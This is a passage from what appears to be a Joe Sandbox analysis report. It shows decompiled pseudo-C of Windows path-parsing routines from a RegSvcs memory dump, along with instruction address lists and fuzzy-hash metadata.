                                          																		}
                                          																		L83:
                                          																		_t445 = _v104;
                                          																		_v76 = _t445;
                                          																		goto L43;
                                          																	}
                                          																	if(_t365 == 1) {
                                          																		goto L44;
                                          																	} else {
                                          																		goto L35;
                                          																	}
                                          																}
                                          																_t449 = _v80;
                                          																if(_v57 != 0) {
                                          																	if(_t422 > _t449) {
                                          																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
                                          																			_t422 = _t422 - 1;
                                          																			_v96 = _t422;
                                          																		}
                                          																	}
                                          																}
                                          																_t439 = _v92;
                                          																if(_t422 >= _v92) {
                                          																	L52:
                                          																	if(_t422 == 0) {
                                          																		L56:
                                          																		_t425 = _t422 + _t422;
                                          																		_v52 = _t425;
                                          																		if(_v112 != 0) {
                                          																			_t357 = _t422;
                                          																			while(1) {
                                          																				_v100 = _t357;
                                          																				if(_t357 == 0) {
                                          																					break;
                                          																				}
                                          																				if( *((short*)(_t386 + _t357 * 2 - 2)) == 0x5c) {
                                          																					break;
                                          																				}
                                          																				_t357 = _t357 - 1;
                                          																			}
                                          																			if(_t357 >= _t422) {
                                          																				L113:
                                          																				 *_v112 = 0;
                                          																				goto L57;
                                          																			}
                                          																			if(_t357 < _t449) {
                                          																				goto L113;
                                          																			}
                                          																			 *_v112 = _t386 + _t357 * 2;
                                          																		}
                                          																		L57:
                                          																		_t446 = _t425 & 0x0000ffff;
                                          																		_v64 = _t446;
                                          																		goto L58;
                                          																	}
                                          																	_t422 = _t422 - 1;
                                          																	_v96 = _t422;
                                          																	_t360 =  *(_t386 + _t422 * 2) & 0x0000ffff;
                                          																	if(_t360 == 0x20) {
                                          																		goto L51;
                                          																	}
                                          																	if(_t360 == 0x2e) {
                                          																		goto L51;
                                          																	}
                                          																	_t422 = _t422 + 1;
                                          																	_v96 = _t422;
                                          																	goto L56;
                                          																} else {
                                          																	L51:
                                          																	 *(_t386 + _t422 * 2) = 0;
                                          																	goto L52;
                                          																}
                                          																L69:
                                          																if( *((short*)(_t386 + _t420 * 2)) == 0x2f) {
                                          																	 *((short*)(_t386 + _t420 * 2)) = 0x5c;
                                          																}
                                          																_t420 = _t420 + 1;
                                          																_v100 = _t420;
                                          																_t352 = _v56;
                                          																goto L28;
                                          															}
                                          															_t446 = _t417 & 0x0000ffff;
                                          															_v64 = _t446;
                                          															_t439 = _v92;
                                          															goto L58;
                                          														}
                                          														if(_v116 > 8) {
                                          															goto L26;
                                          														}
                                          														_t446 = 0xa;
                                          														_v64 = 0xa;
                                          														_t439 = _v92;
                                          														goto L58;
                                          													}
                                          													L72:
                                          													if(_t415 > 0xffff) {
                                          														_t446 = 0;
                                          													}
                                          													_v64 = _t446;
                                          													_t439 = _v92;
                                          													goto L58;
                                          												}
                                          												L26:
                                          												_t352 = _v56;
                                          												goto L27;
                                          											}
                                          										}
                                          										_t379 = _t336[2] & 0x0000ffff;
                                          										if(_t379 != 0x5c) {
                                          											if(_t379 == 0x2f) {
                                          												goto L22;
                                          											}
                                          											goto L98;
                                          										}
                                          										L22:
                                          										_t337 = 2;
                                          									}
                                          									goto L23;
                                          								}
                                          								_t450 =  *_t336 & 0x0000ffff;
                                          								if(_t450 == 0x5c || _t450 == 0x2f) {
                                          									if(_t407 < 4) {
                                          										L132:
                                          										_t337 = 4;
                                          										goto L23;
                                          									}
                                          									_t451 = _t336[1] & 0x0000ffff;
                                          									if(_t451 != 0x5c) {
                                          										if(_t451 == 0x2f) {
                                          											goto L87;
                                          										}
                                          										goto L132;
                                          									}
                                          									L87:
                                          									if(_t407 < 6) {
                                          										L135:
                                          										_t337 = 1;
                                          										goto L23;
                                          									}
                                          									_t452 = _t336[2] & 0x0000ffff;
                                          									if(_t452 != 0x2e) {
                                          										if(_t452 == 0x3f) {
                                          											goto L89;
                                          										}
                                          										goto L135;
                                          									}
                                          									L89:
                                          									if(_t407 < 8) {
                                          										L134:
                                          										_t337 = ((0 | _t407 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                          										goto L23;
                                          									}
                                          									_t384 = _t336[3] & 0x0000ffff;
                                          									if(_t384 != 0x5c) {
                                          										if(_t384 == 0x2f) {
                                          											goto L91;
                                          										}
                                          										goto L134;
                                          									}
                                          									L91:
                                          									_t337 = 6;
                                          									goto L23;
                                          								} else {
                                          									goto L17;
                                          								}
                                          							}
                                          						}
                                          					}
                                          					goto L124;
                                          				}
                                          			}

































































































                                          0x013172c5
                                          0x013172c8
                                          0x0135f6b2
                                          0x0135f6b2
                                          0x00000000
                                          0x00000000
                                          0x01316fc5
                                          0x01316fc5
                                          0x01316fcc
                                          0x01316fd8
                                          0x01316fda
                                          0x01316fdd
                                          0x01316fe3
                                          0x01317162
                                          0x0135f845
                                          0x00000000
                                          0x00000000
                                          0x0135f84e
                                          0x0135f8c4
                                          0x0135f8c8
                                          0x0135f8cb
                                          0x0135f8ce
                                          0x013170e0
                                          0x013170e0
                                          0x013170e3
                                          0x013170e3
                                          0x013170ea
                                          0x013170ef
                                          0x013170f1
                                          0x013170f4
                                          0x013170fc
                                          0x013170fd
                                          0x013170fe
                                          0x0131710c
                                          0x0131710c
                                          0x0135f850
                                          0x0135f858
                                          0x0135f87a
                                          0x0135f88a
                                          0x0135f88d
                                          0x0135f890
                                          0x0135f893
                                          0x0135f895
                                          0x0135f898
                                          0x0135f8a4
                                          0x0135f8ad
                                          0x0135f8b0
                                          0x0135f8b3
                                          0x0135f8b3
                                          0x0135f8a4
                                          0x01316fec
                                          0x01316fec
                                          0x01316fee
                                          0x00000000
                                          0x01316ff1
                                          0x01316ff8
                                          0x00000000
                                          0x01316ffe
                                          0x01317004
                                          0x01317006
                                          0x01317006
                                          0x01317010
                                          0x01317017
                                          0x0131701e
                                          0x01317072
                                          0x01317074
                                          0x0131707e
                                          0x01317083
                                          0x01317087
                                          0x01317088
                                          0x0131706c
                                          0x0131706c
                                          0x0131706d
                                          0x00000000
                                          0x0131706d
                                          0x0131707c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0131707c
                                          0x01317020
                                          0x01317023
                                          0x013171ef
                                          0x013171ef
                                          0x013171f2
                                          0x013171f7
                                          0x00000000
                                          0x00000000
                                          0x013171fd
                                          0x01317200
                                          0x01317205
                                          0x0131720b
                                          0x0131720e
                                          0x013172eb
                                          0x00000000
                                          0x00000000
                                          0x013172f6
                                          0x00000000
                                          0x01317030
                                          0x01317037
                                          0x0131703e
                                          0x01317055
                                          0x0131705a
                                          0x01317062
                                          0x0135f908
                                          0x0135f90e
                                          0x0135f90f
                                          0x0135f90f
                                          0x0135f908
                                          0x01317062
                                          0x0131705a
                                          0x00000000
                                          0x01317045
                                          0x01317045
                                          0x01317049
                                          0x0131704a
                                          0x0131704d
                                          0x0131704e
                                          0x00000000
                                          0x0131704e
                                          0x0131703e
                                          0x01317068
                                          0x01317069
                                          0x00000000
                                          0x01317069
                                          0x013172fc
                                          0x01317301
                                          0x01317304
                                          0x01317314
                                          0x01317314
                                          0x01317319
                                          0x00000000
                                          0x00000000
                                          0x01317325
                                          0x0131732d
                                          0x01317330
                                          0x01317356
                                          0x01317357
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01317332
                                          0x01317332
                                          0x01317337
                                          0x00000000
                                          0x00000000
                                          0x01317343
                                          0x0131734b
                                          0x0131734e
                                          0x01317361
                                          0x00000000
                                          0x00000000
                                          0x01317367
                                          0x01317367
                                          0x01317368
                                          0x00000000
                                          0x01317368
                                          0x01317350
                                          0x01317351
                                          0x01317351
                                          0x00000000
                                          0x01317332
                                          0x0135f8f9
                                          0x0135f8f9
                                          0x0135f8fa
                                          0x00000000
                                          0x0135f8fa
                                          0x01317306
                                          0x0131730e
                                          0x0135f8ee
                                          0x00000000
                                          0x00000000
                                          0x0135f8f4
                                          0x00000000
                                          0x0131730e
                                          0x01317214
                                          0x01317214
                                          0x01317217
                                          0x00000000
                                          0x01317217
                                          0x0131702c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0131702c
                                          0x0131708d
                                          0x01317094
                                          0x01317098
                                          0x013170a0
                                          0x0131738c
                                          0x0131738d
                                          0x0131738d
                                          0x013170a0
                                          0x01317098
                                          0x013170a6
                                          0x013170ab
                                          0x013170b3
                                          0x013170b5
                                          0x013170cd
                                          0x013170cd
                                          0x013170d0
                                          0x013170d8
                                          0x0131711a
                                          0x0131711c
                                          0x0131711c
                                          0x01317121
                                          0x00000000
                                          0x00000000
                                          0x01317129
                                          0x00000000
                                          0x00000000
                                          0x0131712b
                                          0x0131712b
                                          0x01317130
                                          0x0131737e
                                          0x01317381
                                          0x00000000
                                          0x01317381
                                          0x01317138
                                          0x00000000
                                          0x00000000
                                          0x01317144
                                          0x01317144
                                          0x013170da
                                          0x013170da
                                          0x013170dd
                                          0x00000000
                                          0x013170dd
                                          0x013170b7
                                          0x013170b8
                                          0x013170bb
                                          0x013170c2
                                          0x00000000
                                          0x00000000
                                          0x013170c7
                                          0x00000000
                                          0x00000000
                                          0x013170c9
                                          0x013170ca
                                          0x00000000
                                          0x013170ad
                                          0x013170ad
                                          0x013170af
                                          0x00000000
                                          0x013170af
                                          0x01317148
                                          0x0131714d
                                          0x0135f8e2
                                          0x0135f8e2
                                          0x01317153
                                          0x01317154
                                          0x01317157
                                          0x00000000
                                          0x01317157
                                          0x0135f87c
                                          0x0135f87f
                                          0x0135f882
                                          0x00000000
                                          0x0135f882
                                          0x0135f85e
                                          0x00000000
                                          0x00000000
                                          0x0135f864
                                          0x0135f869
                                          0x0135f86c
                                          0x00000000
                                          0x0135f86c
                                          0x01317168
                                          0x01317170
                                          0x0135f8d6
                                          0x0135f8d6
                                          0x01317176
                                          0x01317179
                                          0x00000000
                                          0x01317179
                                          0x01316fe9
                                          0x01316fe9
                                          0x00000000
                                          0x01316fe9
                                          0x01316fbf
                                          0x01316f8c
                                          0x01316f93
                                          0x013172d6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013172d6
                                          0x01316f99
                                          0x01316f99
                                          0x01316f99
                                          0x00000000
                                          0x01316f68
                                          0x01316f50
                                          0x01316f56
                                          0x0131722c
                                          0x0135f629
                                          0x0135f629
                                          0x00000000
                                          0x0135f629
                                          0x01317232
                                          0x01317239
                                          0x0135f623
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0135f623
                                          0x0131723f
                                          0x01317242
                                          0x0135f64e
                                          0x0135f64e
                                          0x00000000
                                          0x0135f64e
                                          0x01317248
                                          0x0131724f
                                          0x01317373
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01317379
                                          0x01317255
                                          0x01317258
                                          0x0135f63c
                                          0x0135f648
                                          0x00000000
                                          0x0135f648
                                          0x0131725e
                                          0x01317265
                                          0x0135f636
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0135f636
                                          0x0131726b
                                          0x0131726b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01316f56
                                          0x01316f3d
                                          0x01316ed2
                                          0x00000000
                                          0x01316ec4

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 56212b7b9515d4dd8d7bb8edc2926ecf2abdb6e71ae8bc17f613eb81b8bc0960
                                          • Instruction ID: 76124240f2b0f7a9f1b2e19b3b0f4bd1dc5aa91a7a2bf3eb0abef6d41eb2aab6
                                          • Opcode Fuzzy Hash: 56212b7b9515d4dd8d7bb8edc2926ecf2abdb6e71ae8bc17f613eb81b8bc0960
                                          • Instruction Fuzzy Hash: A902B275D10219CBCB2CCF9CC480AADBBB5FF44708F69402EE915EB659E7709882CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E01314120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                          				signed int _v8;
                                          				void* _v20;
                                          				signed int _v24;
                                          				char _v532;
                                          				char _v540;
                                          				signed short _v544;
                                          				signed int _v548;
                                          				signed short* _v552;
                                          				signed short _v556;
                                          				signed short* _v560;
                                          				signed short* _v564;
                                          				signed short* _v568;
                                          				void* _v570;
                                          				signed short* _v572;
                                          				signed short _v576;
                                          				signed int _v580;
                                          				char _v581;
                                          				void* _v584;
                                          				unsigned int _v588;
                                          				signed short* _v592;
                                          				void* _v597;
                                          				void* _v600;
                                          				void* _v604;
                                          				void* _v609;
                                          				void* _v616;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				unsigned int _t161;
                                          				signed int _t162;
                                          				unsigned int _t163;
                                          				void* _t169;
                                          				signed short _t173;
                                          				signed short _t177;
                                          				signed short _t181;
                                          				unsigned int _t182;
                                          				signed int _t185;
                                          				signed int _t213;
                                          				signed int _t225;
                                          				short _t233;
                                          				signed char _t234;
                                          				signed int _t242;
                                          				signed int _t243;
                                          				signed int _t244;
                                          				signed int _t245;
                                          				signed int _t250;
                                          				void* _t251;
                                          				signed short* _t254;
                                          				void* _t255;
                                          				signed int _t256;
                                          				void* _t257;
                                          				signed short* _t260;
                                          				signed short _t265;
                                          				signed short* _t269;
                                          				signed short _t271;
                                          				signed short** _t272;
                                          				signed short* _t275;
                                          				signed short _t282;
                                          				signed short _t283;
                                          				signed short _t290;
                                          				signed short _t299;
                                          				signed short _t307;
                                          				signed int _t308;
                                          				signed short _t311;
                                          				signed short* _t315;
                                          				signed short _t316;
                                          				void* _t317;
                                          				void* _t319;
                                          				signed short* _t321;
                                          				void* _t322;
                                          				void* _t323;
                                          				unsigned int _t324;
                                          				signed int _t325;
                                          				void* _t326;
                                          				signed int _t327;
                                          				signed int _t329;
                                          
                                          				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                          				_v8 =  *0x13ed360 ^ _t329;
                                          				_t157 = _a8;
                                          				_t321 = _a4;
                                          				_t315 = __edx;
                                          				_v548 = __ecx;
                                          				_t305 = _a20;
                                          				_v560 = _a12;
                                          				_t260 = _a16;
                                          				_v564 = __edx;
                                          				_v580 = _a8;
                                          				_v572 = _t260;
                                          				_v544 = _a20;
                                          				if( *__edx <= 8) {
                                          					L3:
                                          					if(_t260 != 0) {
                                          						 *_t260 = 0;
                                          					}
                                          					_t254 =  &_v532;
                                          					_v588 = 0x208;
                                          					if((_v548 & 0x00000001) != 0) {
                                          						_v556 =  *_t315;
                                          						_v552 = _t315[2];
                                          						_t161 = E0132F232( &_v556);
                                          						_t316 = _v556;
                                          						_v540 = _t161;
                                          						goto L17;
                                          					} else {
                                          						_t306 = 0x208;
                                          						_t298 = _t315;
                                          						_t316 = E01316E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                          						if(_t316 == 0) {
                                          							L68:
                                          							_t322 = 0xc0000033;
                                          							goto L39;
                                          						} else {
                                          							while(_v581 == 0) {
                                          								_t233 = _v588;
                                          								if(_t316 > _t233) {
                                          									_t234 = _v548;
                                          									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                          										_t254 = L01314620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                          										if(_t254 == 0) {
                                          											_t169 = 0xc0000017;
                                          										} else {
                                          											_t298 = _v564;
                                          											_v588 = _t316;
                                          											_t306 = _t316;
                                          											_t316 = E01316E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                          											if(_t316 != 0) {
                                          												continue;
                                          											} else {
                                          												goto L68;
                                          											}
                                          										}
                                          									} else {
                                          										goto L90;
                                          									}
                                          								} else {
                                          									_v556 = _t316;
                                          									 *((short*)(_t329 + 0x32)) = _t233;
                                          									_v552 = _t254;
                                          									if(_t316 < 2) {
                                          										L11:
                                          										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                          											_t161 = 5;
                                          										} else {
                                          											if(_t316 < 6) {
                                          												L87:
                                          												_t161 = 3;
                                          											} else {
                                          												_t242 = _t254[2] & 0x0000ffff;
                                          												if(_t242 != 0x5c) {
                                          													if(_t242 == 0x2f) {
                                          														goto L16;
                                          													} else {
                                          														goto L87;
                                          													}
                                          													goto L101;
                                          												} else {
                                          													L16:
                                          													_t161 = 2;
                                          												}
                                          											}
                                          										}
                                          									} else {
                                          										_t243 =  *_t254 & 0x0000ffff;
                                          										if(_t243 == 0x5c || _t243 == 0x2f) {
                                          											if(_t316 < 4) {
                                          												L81:
                                          												_t161 = 4;
                                          												goto L17;
                                          											} else {
                                          												_t244 = _t254[1] & 0x0000ffff;
                                          												if(_t244 != 0x5c) {
                                          													if(_t244 == 0x2f) {
                                          														goto L60;
                                          													} else {
                                          														goto L81;
                                          													}
                                          												} else {
                                          													L60:
                                          													if(_t316 < 6) {
                                          														L83:
                                          														_t161 = 1;
                                          														goto L17;
                                          													} else {
                                          														_t245 = _t254[2] & 0x0000ffff;
                                          														if(_t245 != 0x2e) {
                                          															if(_t245 == 0x3f) {
                                          																goto L62;
                                          															} else {
                                          																goto L83;
                                          															}
                                          														} else {
                                          															L62:
                                          															if(_t316 < 8) {
                                          																L85:
                                          																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                          																goto L17;
                                          															} else {
                                          																_t250 = _t254[3] & 0x0000ffff;
                                          																if(_t250 != 0x5c) {
                                          																	if(_t250 == 0x2f) {
                                          																		goto L64;
                                          																	} else {
                                          																		goto L85;
                                          																	}
                                          																} else {
                                          																	L64:
                                          																	_t161 = 6;
                                          																	goto L17;
                                          																}
                                          															}
                                          														}
                                          													}
                                          												}
                                          											}
                                          											goto L101;
                                          										} else {
                                          											goto L11;
                                          										}
                                          									}
                                          									L17:
                                          									if(_t161 != 2) {
                                          										_t162 = _t161 - 1;
                                          										if(_t162 > 5) {
                                          											goto L18;
                                          										} else {
                                          											switch( *((intOrPtr*)(_t162 * 4 +  &M013145F8))) {
                                          												case 0:
                                          													_v568 = 0x12d1078;
                                          													__eax = 2;
                                          													goto L20;
                                          												case 1:
                                          													goto L18;
                                          												case 2:
                                          													_t163 = 4;
                                          													goto L19;
                                          											}
                                          										}
                                          										goto L41;
                                          									} else {
                                          										L18:
                                          										_t163 = 0;
                                          										L19:
                                          										_v568 = 0x12d11c4;
                                          									}
                                          									L20:
                                          									_v588 = _t163;
                                          									_v564 = _t163 + _t163;
                                          									_t306 =  *_v568 & 0x0000ffff;
                                          									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                          									_v576 = _t265;
                                          									if(_t265 > 0xfffe) {
                                          										L90:
                                          										_t322 = 0xc0000106;
                                          									} else {
                                          										if(_t321 != 0) {
                                          											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                          												if(_v580 != 0) {
                                          													goto L23;
                                          												} else {
                                          													_t322 = 0xc0000106;
                                          													goto L39;
                                          												}
                                          											} else {
                                          												_t177 = _t306;
                                          												goto L25;
                                          											}
                                          											goto L101;
                                          										} else {
                                          											if(_v580 == _t321) {
                                          												_t322 = 0xc000000d;
                                          											} else {
                                          												L23:
                                          												_t173 = L01314620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                          												_t269 = _v592;
                                          												_t269[2] = _t173;
                                          												if(_t173 == 0) {
                                          													_t322 = 0xc0000017;
                                          												} else {
                                          													_t316 = _v556;
                                          													 *_t269 = 0;
                                          													_t321 = _t269;
                                          													_t269[1] = _v576;
                                          													_t177 =  *_v568 & 0x0000ffff;
                                          													L25:
                                          													_v580 = _t177;
                                          													if(_t177 == 0) {
                                          														L29:
                                          														_t307 =  *_t321 & 0x0000ffff;
                                          													} else {
                                          														_t290 =  *_t321 & 0x0000ffff;
                                          														_v576 = _t290;
                                          														_t310 = _t177 & 0x0000ffff;
                                          														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                          															_t307 =  *_t321 & 0xffff;
                                          														} else {
                                          															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                          															E0133F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                          															_t329 = _t329 + 0xc;
                                          															_t311 = _v580;
                                          															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                          															 *_t321 = _t225;
                                          															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                          																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                          															}
                                          															goto L29;
                                          														}
                                          													}
                                          													_t271 = _v556 - _v588 + _v588;
                                          													_v580 = _t307;
                                          													_v576 = _t271;
                                          													if(_t271 != 0) {
                                          														_t308 = _t271 & 0x0000ffff;
                                          														_v588 = _t308;
                                          														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                          															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                          															E0133F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                          															_t329 = _t329 + 0xc;
                                          															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                          															 *_t321 = _t213;
                                          															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                          																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                          															}
                                          														}
                                          													}
                                          													_t272 = _v560;
                                          													if(_t272 != 0) {
                                          														 *_t272 = _t321;
                                          													}
                                          													_t306 = 0;
                                          													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                          													_t275 = _v572;
                                          													if(_t275 != 0) {
                                          														_t306 =  *_t275;
                                          														if(_t306 != 0) {
                                          															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                          														}
                                          													}
                                          													_t181 = _v544;
                                          													if(_t181 != 0) {
                                          														 *_t181 = 0;
                                          														 *((intOrPtr*)(_t181 + 4)) = 0;
                                          														 *((intOrPtr*)(_t181 + 8)) = 0;
                                          														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                          														if(_v540 == 5) {
                                          															_t182 = E012F52A5(1);
                                          															_v588 = _t182;
                                          															if(_t182 == 0) {
                                          																E0130EB70(1, 0x13e79a0);
                                          																goto L38;
                                          															} else {
                                          																_v560 = _t182 + 0xc;
                                          																_t185 = E0130AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                          																if(_t185 == 0) {
                                          																	_t324 = _v588;
                                          																	goto L97;
                                          																} else {
                                          																	_t306 = _v544;
                                          																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                          																	 *(_t306 + 4) = _t282;
                                          																	_v576 = _t282;
                                          																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                          																	 *_t306 = _t325;
                                          																	if( *_t282 == 0x5c) {
                                          																		_t149 = _t325 - 2; // -2
                                          																		_t283 = _t149;
                                          																		 *_t306 = _t283;
                                          																		 *(_t306 + 4) = _v576 + 2;
                                          																		_t185 = _t283 & 0x0000ffff;
                                          																	}
                                          																	_t324 = _v588;
                                          																	 *(_t306 + 2) = _t185;
                                          																	if((_v548 & 0x00000002) == 0) {
                                          																		L97:
                                          																		asm("lock xadd [esi], eax");
                                          																		if((_t185 | 0xffffffff) == 0) {
                                          																			_push( *((intOrPtr*)(_t324 + 4)));
                                          																			E013395D0();
                                          																			L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                          																		}
                                          																	} else {
                                          																		 *(_t306 + 0xc) = _t324;
                                          																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                          																	}
                                          																	goto L38;
                                          																}
                                          															}
                                          															goto L41;
                                          														}
                                          													}
                                          													L38:
                                          													_t322 = 0;
                                          												}
                                          											}
                                          										}
                                          									}
                                          									L39:
                                          									if(_t254 !=  &_v532) {
                                          										L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                          									}
                                          									_t169 = _t322;
                                          								}
                                          								goto L41;
                                          							}
                                          							goto L68;
                                          						}
                                          					}
                                          					L41:
                                          					_pop(_t317);
                                          					_pop(_t323);
                                          					_pop(_t255);
                                          					return E0133B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                          				} else {
                                          					_t299 = __edx[2];
                                          					if( *_t299 == 0x5c) {
                                          						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                          						if(_t256 != 0x5c) {
                                          							if(_t256 != 0x3f) {
                                          								goto L2;
                                          							} else {
                                          								goto L50;
                                          							}
                                          						} else {
                                          							L50:
                                          							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                          								goto L2;
                                          							} else {
                                          								_t251 = E01333D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                          								_pop(_t319);
                                          								_pop(_t326);
                                          								_pop(_t257);
                                          								return E0133B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                          							}
                                          						}
                                          					} else {
                                          						L2:
                                          						_t260 = _v572;
                                          						goto L3;
                                          					}
                                          				}
                                          				L101:
                                          			}















































































                                          0x013143c5
                                          0x01314463
                                          0x01314463
                                          0x013143ce
                                          0x013143d5
                                          0x013143d9
                                          0x013143df
                                          0x01314475
                                          0x01314479
                                          0x01314491
                                          0x01314491
                                          0x01314479
                                          0x013143e5
                                          0x013143eb
                                          0x013143f4
                                          0x013143f6
                                          0x013143f9
                                          0x013143fc
                                          0x013143ff
                                          0x013144e8
                                          0x013144ed
                                          0x013144f3
                                          0x0135e247
                                          0x00000000
                                          0x013144f9
                                          0x01314504
                                          0x01314508
                                          0x0131450f
                                          0x0135e269
                                          0x00000000
                                          0x01314515
                                          0x01314519
                                          0x01314531
                                          0x01314534
                                          0x01314537
                                          0x0131453e
                                          0x01314541
                                          0x0131454a
                                          0x0135e255
                                          0x0135e255
                                          0x0135e25b
                                          0x0135e25e
                                          0x0135e261
                                          0x0135e261
                                          0x01314555
                                          0x01314559
                                          0x0131455d
                                          0x0135e26d
                                          0x0135e270
                                          0x0135e274
                                          0x0135e27a
                                          0x0135e27d
                                          0x0135e28e
                                          0x0135e28e
                                          0x01314563
                                          0x01314563
                                          0x01314569
                                          0x01314569
                                          0x00000000
                                          0x0131455d
                                          0x0131450f
                                          0x00000000
                                          0x013144f3
                                          0x013143ff
                                          0x01314405
                                          0x01314405
                                          0x01314405
                                          0x013142ac
                                          0x0131428c
                                          0x01314282
                                          0x01314407
                                          0x0131440d
                                          0x0135e2af
                                          0x0135e2af
                                          0x01314413
                                          0x01314413
                                          0x00000000
                                          0x013141d4
                                          0x00000000
                                          0x013141c3
                                          0x013141bd
                                          0x01314415
                                          0x01314415
                                          0x01314416
                                          0x01314417
                                          0x01314429
                                          0x0131416e
                                          0x0131416e
                                          0x01314175
                                          0x01314498
                                          0x0131449f
                                          0x0135e12d
                                          0x00000000
                                          0x0135e133
                                          0x00000000
                                          0x0135e133
                                          0x013144a5
                                          0x013144a5
                                          0x013144aa
                                          0x00000000
                                          0x013144bb
                                          0x013144ca
                                          0x013144d6
                                          0x013144d7
                                          0x013144d8
                                          0x013144e3
                                          0x013144e3
                                          0x013144aa
                                          0x0131417b
                                          0x0131417b
                                          0x0131417b
                                          0x00000000
                                          0x0131417b
                                          0x01314175
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0205f77027392056653fe80edf20bca236fe95d5a9f8869ec0b53e0c483a4fb1
                                          • Instruction ID: a65f6f5c4f505d47384a18b36eaaa184260c8f4c92f09ac3c08b6e842619736c
                                          • Opcode Fuzzy Hash: 0205f77027392056653fe80edf20bca236fe95d5a9f8869ec0b53e0c483a4fb1
                                          • Instruction Fuzzy Hash: A1F18D706083118FD728CF19C480A7ABBE5FF88758F04892EF996CB695E734D991CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E013220A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed char _v24;
                                          				intOrPtr _v28;
                                          				signed int _v32;
                                          				void* _v36;
                                          				char _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				unsigned int _v60;
                                          				char _v64;
                                          				unsigned int _v68;
                                          				signed int _v72;
                                          				char _v73;
                                          				signed int _v74;
                                          				char _v75;
                                          				signed int _v76;
                                          				void* _v81;
                                          				void* _v82;
                                          				void* _v89;
                                          				void* _v92;
                                          				void* _v97;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed char _t128;
                                          				void* _t129;
                                          				signed int _t130;
